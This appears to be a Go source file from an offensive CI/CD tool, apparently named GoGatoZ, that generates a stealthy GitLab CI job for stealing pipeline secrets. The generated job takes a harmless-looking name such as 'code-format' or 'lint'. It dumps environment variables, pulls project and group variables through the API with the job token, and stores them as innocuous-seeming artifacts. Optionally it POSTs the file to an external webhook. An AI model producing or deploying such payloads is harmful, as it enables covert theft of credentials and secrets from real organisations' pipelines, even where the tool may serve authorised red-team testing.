package payloads

import (
	"fmt"
	"strings"
)

// WorkflowExfilOptions configures the workflow exfil payload.
type WorkflowExfilOptions struct {
	Common       CommonOptions
	DisguiseName string // plausible job name (default: "code-format")
	WebhookURL   string // optional secondary exfil via HTTP POST
	DumpGroupVars bool  // also dump group-level variables
}

// GenerateWorkflowExfilYAML returns a stealthy GitLab CI job that exfiltrates
// CI variables via artifacts disguised as legitimate tooling output.
func GenerateWorkflowExfilYAML(o WorkflowExfilOptions) string {
	disguise := strings.TrimSpace(o.DisguiseName)
	if disguise == "" {
		disguise = "code-format"
	}
	name, stage := o.Common.defaults(disguise)

	outFile := "format-results.txt"
	switch {
	case strings.Contains(disguise, "dep"):
		outFile = "dep-report.json"
	case strings.Contains(disguise, "lint"):
		outFile = "lint-output.txt"
	case strings.Contains(disguise, "diag"):
		outFile = "diagnostics.log"
	}

	var scriptLines []string
	scriptLines = append(scriptLines, fmt.Sprintf("    - printenv | sort > %s", outFile))
	scriptLines = append(scriptLines,
		fmt.Sprintf(`    - 'curl -s "$CI_API_V4_URL/projects/$CI_PROJECT_ID/variables" -H "PRIVATE-TOKEN: $CI_JOB_TOKEN" >> %s || true'`, outFile))

	if o.DumpGroupVars {
		scriptLines = append(scriptLines,
			fmt.Sprintf(`    - 'curl -s "$CI_API_V4_URL/groups/$CI_PROJECT_NAMESPACE_ID/variables" -H "PRIVATE-TOKEN: $CI_JOB_TOKEN" >> %s || true'`, outFile))
	}

	if strings.TrimSpace(o.WebhookURL) != "" {
		scriptLines = append(scriptLines,
			fmt.Sprintf(`    - 'curl -s -X POST -F "file=@%s" %q || true'`, outFile, o.WebhookURL))
	}

	expire := strings.TrimSpace(o.Common.ArtifactsExpire)
	if expire == "" {
		expire = "1 day"
	}

	body := fmt.Sprintf("# Auto-generated by GoGatoZ (Workflow Exfil)\nstages: [%s]\n\n%s:\n  stage: %s%s%s\n  script:\n%s\n  artifacts:\n    when: always\n    paths:\n      - %s\n    expire_in: %s\n  allow_failure: true%s\n",
		stage, name, stage,
		imageLine(o.Common.Image),
		tagsLine(o.Common.Tags),
		strings.Join(scriptLines, "\n"),
		outFile, expire,
		rulesManual(o.Common.Manual))
	return body
}
